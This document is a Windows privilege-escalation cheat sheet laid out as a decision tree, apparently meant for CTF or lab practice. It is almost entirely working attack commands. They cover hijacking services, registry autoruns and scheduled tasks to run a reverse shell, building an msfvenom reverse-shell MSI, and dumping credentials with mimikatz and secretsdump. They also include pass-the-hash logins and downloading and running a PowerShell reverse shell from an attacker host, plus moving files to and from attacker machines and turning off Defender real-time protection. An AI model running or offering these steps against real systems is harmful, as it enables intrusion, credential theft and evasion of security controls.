Windows PE Mind Map

The document discusses techniques for token abusing on Windows systems. It mentions checking privileges with whoami/priv and searching for insecure service permissions, unquoted services, or weak registry permissions that could allow for service exploiting.
Windows PE Mind Map

This mind map covers these techniques:
1 + Misconfigured Privileges
- Token Abusing
2 + Services
- Service Exploits - Insecure Service Permissions
- Service Exploits - Unquoted Service Path
- Service Exploits - Weak Registry Permissions
- Service Exploits - Insecure Service Executables
3 + Registry
- Registry - AutoRuns
- Registry - AlwaysInstallElevated
4 + Scheduled Tasks
5 + Creds in files / Harvesting Passwords from Usual Spots
- Unattend.xml
- Powershell History
- Saved Windows Credentials
- IIS Configuration
6 + Password Dumping
- mimikatz
- secretsdump with SAM & SYSTEM
7 + Local ports
8 + Other Methods
- Dll Hijacking
- Interesting Groups / DnsAdmins
- Insecure Gui Apps
9 + Vulnerable software
10 + CVE & KERNEL EXPLOIT
- WES-NG

TOKEN ABUSING

`whoami /priv` (Do we have any of the following permissions?)
- YES: Search the privilege you've found on the internet, follow the instructions.
- NO: continue with SERVICE EXPLOITING.

SERVICE EXPLOITING

Insecure Service Permissions
Is there any service that we have permission to change the config of?: `accesschk.exe -uwcqv "$username" *` (we are looking for the "SERVICE_CHANGE_CONFIG" privilege)
- YES: `sc config $service_name= "\"C:\Path\to\revshell.exe\""` then `net start $service_name`
- NO: continue.

Unquoted Services
Are there any unquoted services?: `wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """`
- YES: `copy C:\Path\to\revshell.exe "C:\Path\to\service\directory\$service_name.exe"` then `net start $service_name`
- NO: continue.

Weak Registry Permissions
Use accesschk. Is there any service that has the "NT AUTHORITY\INTERACTIVE" privilege?: `
- YES: `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Path\to\revshell.exe /f` then `net start $service_name`
- NO: continue.

Insecure Service Executables
Using accesschk.exe, is there any service whose (BINARY_PATH_NAME) file is writable by everyone?: `accesschk.exe /accepteula -quvw "C:\Path\to\insecureservice.exe"`
- YES: `copy C:\Path\to\revshell.exe "C:\Path\to\vulnerable\service\directory\$service_name" /Y`
- NO: continue with REGISTRY EXPLOITATION.

REGISTRY EXPLOITATION

Auto Runs
Run the following command. Is there any non-default .exe file?: `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- YES: `copy C:\Path\to\revshell.exe "C:\Program Files\Autorun Program\program.exe" /Y`
- NO: continue.

AlwaysInstallElevated
Check if the "Always Install Elevated" vulnerability exists: `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` and `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
Do you see that both keys are equal to 0x1?
- YES: Create a .msi backdoor and transfer it to the target: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f msi -o reverse.msi` then `msiexec /quiet /qn /i C:\Path\to\revshell.msi`
- NO: continue with SCHEDULED TASKS.

SCHEDULED TASKS

Do we have any non-default scheduled task?: `Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State`
- YES: Use accesschk. Do we have write permission on that file?: `accesschk.exe /accepteula -quvw user C:\Path\To\Scheduled\task.ps1`
  - YES: `echo C:\Path\To\revshell.exe >> C:\Path\To\Scheduled\task.ps1`
- NO: continue with CREDENTIAL HARVESTING.

CREDENTIAL HARVESTING

Unattend.xml
Check the following locations. Do they exist, and did you find creds in them?
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml

Powershell history
Check the powershell history: `type C:\Users\$User_name\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`

Saved Credentials
Check if we have any saved credentials: `cmdkey /list`

IIS Configuration
Check if we have any credentials in the IIS configuration page: `C:\inetpub\wwwroot\web.config` and `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config`

Did you find anything?
- YES: Great, authenticate yourself with the brand new creds you've obtained.
- NO: continue with HASH DUMPING.

HASH DUMPING

Mimikatz
Upload mimikatz and dump the hashes: `./mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"`
Are you authenticated for this process and/or did you find anything?
- YES: Use evil-winrm if the target's winrm port is open. Use tools that allow a PTH attack; if you find yourself in trouble, crack the hash with hashcat (-m 1000).
- NO: continue.

Sam & System
Check if you have SeBackupPrivilege or are authorized to read these files:
- C:\Windows\repair\SAM
- C:\Windows\repair\SYSTEM
- YES (three options):
  - Transfer the files to the attacker machine and use creddump7: `python3 creddump7/pwdump.py SYSTEM SAM`
  - Transfer the files to the attacker machine and use impacket's secretsdump: `secretsdump.py -sam SAM -system SYSTEM LOCAL`
  - This doesn't require a file transfer (assuming we uploaded mimikatz already). Launch mimikatz and give this command: `lsadump::sam /system:SYSTEM /SAM:SAM`
- NO: continue with LOCAL PORTS.

LOCAL PORTS

Do we have a local port that isn't listed by nmap?: `netstat -ano`
- YES: Use chisel to find out what's going on over there.
- NO: continue with OTHER METHODS.

OTHER METHODS

Interesting Groups
Check if we're a part of an interesting group such as DnsAdmins.
- YES: Check Hacktricks or Google the group, follow the instructions.
- NO: continue.

Dll Hijacking
Upload procmon and look for not-found dlls, and follow the instructions of the link that is attached. Did you find what you're looking for?
- NO: continue.

Insecure Gui Apps
Do you have GUI access?
- YES: Check if there is any application that is running as Admin, such as paint.
  - YES: In short, try to open another file in the misconfigured application and enter the full path of cmd.exe. This article will help you.
- NO: continue with VULNERABLE APPS.

Great, enjoy your new privileges. What a lovely day, isn't it?

VULNERABLE APPS

Run the attached command to get all the installed apps with their version numbers and search for vulnerabilities for their version. Did you find what you're looking for?
- NO: continue with CVE & KERNEL EXPLOIT.

CVE & KERNEL EXPLOIT

Run `systeminfo > systeminfo.txt`, transfer the output to the attacker machine and pipe it to WES-NG. It's gotta be a kernel exploit.
- NO: We've covered the most common ways to escalate our privileges in Windows; now we can use WinPeas to make sure we didn't miss anything.

File Transfer Tips

Python
`python3 -m http.server 80`

SMB
Run the server on Kali:
`sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .`
OR
`python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share`
On Windows, check that the share can be seen:
`net view \\10.0.0.1`
Regular filesystem commands should all work, and files can be copied to and from the share:
Download From Windows: `copy \\10.0.0.1\kali\file.exe C:\Windows\Temp\file.exe`
Download From Kali: `copy C:\Windows\Temp\file.exe \\10.0.0.1\kali\file.exe`

Netcat
(on the receiver side) `nc -l -p 1234 > [file_name]`
(on the sender side) `nc -w 3 10.2.111.159 1234 < [file_name]`
Note: If it doesn't work you can try this on the sender side:
`cat [file_name] | nc 10.11.34.130 321`
On Windows run:
`nc.exe -nv 10.0.0.1 4444 < file.exe`

Powershell
Transferring from Kali to Windows. Go to the terminal and open a listener with:
`python3 -m http.server 80`
Download it from Windows (as x64 bits):
`C:\\Windows\\SysNative\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.Webclient).downloadString('http://10.10.10.10/Invoke-PowershellTcp.ps1')`

CertUtil
certutil.exe is available on more modern versions of Windows.
`certutil.exe -urlcache -split -f http://10.0.0.1:4444/file.exe C:\Windows\Temp\file.exe`

Some Quick Tips&Tricks

- If you're having issues with AV (you can check it with this command: `Get-Service WinDefend`) and you have privileges to turn it off, here is the command that does that: `Set-MpPreference -DisableRealtimeMonitoring $true`
- If you see "Remote Management Users" in the results of `whoami /all`, you are able to use GUI logins against the target.
- psexec stands for powershell execution; alternatively you can use wmiexec as well as smbexec, but the best way, if the winrm port is open, is to use evil-winrm.
- `C:\Inetpub\wwwroot` is the webserver directory of Windows, similar to /var/www on Linux systems.
- The best directory to work in: C:\Windows\System32\spool\drivers\color. Every Windows machine has this directory, it is world writeable, and you'll not have issues with AV.
- If you are dealing with a Windows version 2008 or older, you can get credentials in groups.xml; it's GPP encrypted. You can install gpp-decrypt like this: `apt-get install gpp-decrypt`, and decode the hash with `gpp-decrypt <hash>`.
- You can get credentials from .ntds files like this: `impacket-secretsdump -ntds ntds.dit -system SYSTEM`
- `Get-Service | Where-Object -Property Status -EQ Running` to get all running services. OR: `Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}`. OR simply: `tasklist /svc`, or `services` / `service`.
- `netsh advfirewall show currentprofile` to show the status of the firewall.
- `icacls <PATH>` to query your privileges on a certain file or directory.
- If the redis port is open, then it's there for a reason; check it out (#6479-Redis).
- You can unzip files in Windows with: `Expand-Archive -Force $path_to_zip $path_to_save`
- If you have an NTLM hash but not a password, you can use it like this:
  Connect to RDP using PtH: `xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH`
  Connect via psexec using PtH: `psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP` (Note: only the Linux version of psexec supports PtH.)
  Connect to WinRM using PtH: `evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH`

References:
• https://sirensecurity.io/blog/windows-privilege-escalation-resources/
• https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
• https://github.com/Guiomuh/LPE_checklist
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md
• https://medium.com/@s12deff/winpeas-windows-privilege-escalation-f5f5b1737829